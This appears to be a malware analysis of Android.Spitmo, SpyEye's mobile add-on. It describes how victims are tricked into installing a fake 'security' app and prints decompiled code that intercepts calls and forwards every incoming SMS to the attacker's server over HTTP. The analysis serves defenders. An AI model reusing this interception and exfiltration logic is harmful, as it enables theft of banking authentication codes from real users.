Detailed Analysis of Android.Spitmo
Intro: What is Android.Spitmo?
Android.Spitmo is the mobile “add-on” for SpyEye. Infected with this combination of malware, the attacker is able to modify banking orders made by the victim, even if they are secured by mTan.
Step 1: Forcing the User to Install the App
If the machine of a user is compromised with SpyEye and the user tries to browse to his bank website a message is shown presenting a new security solution which is now obligatory in order to use the online banking service in the future. The new solution pretends to be an Android application that protects the phone’s SMS messages from being intercepted by a Trojan installed on the smartphone. The user is then directed to a download page.
After the user has downloaded and installed the app on his Android smartphone, nothing seems to happen at a first glance. There is no new icon on the dashboard, no new running service or running application as you can see in the following screenshot.
After a bit of search, the user is able to find an application called “System” (the malware application). If taking a look at it, you can see that the app has the permissions to access your SMS messages, intercept phone calls and communicate over the Internet:
To complete the installation, the user has to call the number “325000”. The call is intercepted by the malware and an activation code is presented on the home screen to be submitted to the bank’s website afterwards:
The de-compiled code of this action can be seen here:
if (intent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL") && intent.getStringExtra("android.intent.extra.PHONE_NUMBER").equals("325000"))
Toast.makeText(context1, "251340", 0).show();
Step 2: The Trojan Action
After the Trojan has been installed successfully, all incoming SMS messages will be intercepted and send to the attacker’s server.
The de-compiled code below creates a string (?sender=[SenderAddress]&receiver=[ReciverAddress]&text=[Message]”) and is called every time a SMS message is received:
String s3 = (String) ((Iterator) (obj)).next();
String s4 = String.valueOf(s3);
StringBuilder stringbuilder = (new StringBuilder(s4)).append("?sender=");
String s5 = URLEncoder.encode(as);
StringBuilder stringbuilder1 = (new StringBuilder(s5)).append("&receiver=");
String s6 = URLEncoder.encode(as);
StringBuilder stringbuilder2 = (new StringBuilder(s5)).append("&text=");
String s7 = URLEncoder.encode(as);
String s8 = stringbuilder2.append(s7).toString();
java.io.InputStream inputstream = (new URL(s8)).openConnection().getInputStream();
InputStreamReader inputstreamreader = new InputStreamReader(inputstream);
BufferedReader bufferedreader = new BufferedReader(inputstreamreader);
String s9 = bufferedreader.readLine();
bool1 = Boolean.valueOf(true);
obj = bool1;
As implied from the structure of this string, it will be appended to a HTTP request, to be sent to the attacker’s website afterwards. The application package consists of another file called “settings.xml” inside the “asset” directory, which contains the configuration data (as can be seen in the following code snippet):
As far as we know, there are 3 cases for “send value” (1 = HTTP; 2 = SMS & HTTP; any other = SMS). The phone number, the SMS messages get forwarded to, is stored in “telephone value”.
Step 3: The Attacker’s Website
The attacker’s website consist of the following 4 files and a mySQL database:
- config.php (configuration for mySQL access)
- gate.php (receives the HTTP requests from the malware and populates the database)
- json.php (responsible for DB queries)
- index.html (displays the database entries)